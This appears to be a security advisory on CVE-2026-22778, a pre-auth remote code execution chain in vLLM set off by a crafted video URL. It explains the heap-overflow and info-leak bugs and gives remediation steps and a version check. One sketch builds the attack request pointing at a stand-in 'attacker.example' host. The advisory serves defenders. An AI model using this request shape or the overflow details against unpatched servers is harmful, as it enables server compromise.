OX Security — Critical vLLM RCE via malicious video URL (CVE-2026-22778)

  • CVE-2026-22778 (GHSA-4r2x-xpjr-7cvv) is a critical remote code execution chain in vLLM, the widely used LLM serving framework with 3M+ monthly PyPI downloads.
  • Attack vector: send a crafted video URL to vLLM's OpenAI-compatible Completions or Invocations endpoint → vLLM downloads the video → a malicious JPEG2000 cdef box triggers a heap overflow in the OpenCV/FFmpeg decoder → arbitrary command execution on the server.
  • The chain exploits two bugs: (1) a PIL error-message info leak that exposes memory addresses and defeats ASLR, and (2) a JPEG2000 cdef box heap overflow in which the full-resolution Y (luma) plane is remapped into the smaller U (chroma) buffer. Under 4:2:0 subsampling the U plane holds only 0.25×W×H bytes, so writing the W×H-byte Y plane into it yields a controlled overflow of 0.75×W×H bytes.
  • Zero authentication required: default vLLM instances have no API key. Even with a non-default API key enabled, the Invocations route processes the payload pre-auth.
  • Only deployments serving a video-capable model are affected — text-only or image-only endpoints are not vulnerable.
  • The vulnerability was fixed in vLLM 0.14.1. All prior versions serving video models are affected.
  • The root cause sits deep in the media pipeline: vLLM delegates video decoding to cv2.VideoCapture over raw downloaded bytes, trusting the container format without sanitization.
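The attack surface above amounts to a single JSON request. The sketch below shows the general shape of an OpenAI-compatible chat request carrying a remote video URL; the model name, attacker host, and exact content-part schema are illustrative assumptions, not taken from the advisory.

```python
# Illustrative sketch of the request shape. Model name and URL are
# placeholders; the content-part layout follows the common
# OpenAI-compatible multimodal convention and may differ per deployment.
import json

payload = {
    "model": "some-video-capable-model",  # only video-capable models are affected
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this video."},
            # vLLM fetches this URL server-side and hands the raw bytes
            # to the OpenCV/FFmpeg decoder; the malicious JPEG2000
            # stream would be hosted at an attacker-controlled address.
            {"type": "video_url",
             "video_url": {"url": "http://attacker.example/clip.mp4"}},
        ],
    }],
}

# A single unauthenticated POST of this body to the Completions or
# Invocations route is all the chain requires.
print(json.dumps(payload, indent=2))
```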
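The 0.75×W×H figure follows directly from 4:2:0 plane sizes. A quick back-of-the-envelope check, using an arbitrary 1920×1080 frame as the example:

```python
# Overflow arithmetic for the cdef remapping bug, assuming 4:2:0
# chroma subsampling (each chroma plane is W/2 x H/2). Frame size
# is an arbitrary example.
W, H = 1920, 1080

y_plane = W * H                 # full-resolution luma plane, W*H bytes
u_plane = (W // 2) * (H // 2)   # quarter-size chroma buffer, 0.25*W*H bytes

# Remapping Y into the U buffer writes y_plane bytes into a
# u_plane-sized allocation:
overflow = y_plane - u_plane

assert overflow == int(0.75 * W * H)
print(f"{overflow} bytes written past the end of the U buffer")
```

For a 1920×1080 frame that is over 1.5 MB of attacker-influenced data past the allocation, which is ample room to corrupt adjacent heap structures.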

Why it matters

  • vLLM is the dominant open-source LLM serving engine — used in production by thousands of organizations. A pre-auth RCE in it means attackers can compromise AI inference infrastructure with a single HTTP request.
  • Multimodal models (video, image) are rapidly being adopted, expanding vLLM's attack surface beyond text-only deployments. This is the fourth vLLM CVE in two months (after 22773, 24779, 22807).
  • The attack requires no credentials, no user interaction, and no local access — just a reachable vLLM endpoint accepting video input.

What to do

  • Upgrade immediately to vLLM ≥ 0.14.1 if you serve video-capable models.
  • Enable API authentication: never expose vLLM without an API key, and restrict the Invocations route.
  • Network segmentation: vLLM endpoints should not be directly internet-facing. Place them behind an API gateway with auth and rate limiting.
  • Audit multimodal inputs: consider pre-validating or sandboxing media processing before it reaches the inference engine.
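For the upgrade step, a minimal stdlib-only check of the installed vLLM version against the patched release can look like this (the three-segment parse is a simplification that ignores pre-release suffixes):

```python
# Minimal sketch: compare the installed vLLM version against the
# patched 0.14.1 release. Assumes vLLM is installed in the current
# environment and uses a plain X.Y.Z version string.
from importlib.metadata import version, PackageNotFoundError

PATCHED = (0, 14, 1)

def parse_version(v: str) -> tuple:
    """Parse 'X.Y.Z...' into a comparable int tuple (first 3 segments)."""
    return tuple(int(p) for p in v.split(".")[:3])

def is_patched(v: str) -> bool:
    return parse_version(v) >= PATCHED

try:
    installed = version("vllm")
    verdict = "patched" if is_patched(installed) else "UPGRADE to >= 0.14.1"
    print(f"vllm {installed}: {verdict}")
except PackageNotFoundError:
    print("vllm is not installed in this environment")
```

Remember that the version check only covers the first bullet; authentication and network placement still matter because the Invocations route is reported to process payloads pre-auth.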

Sources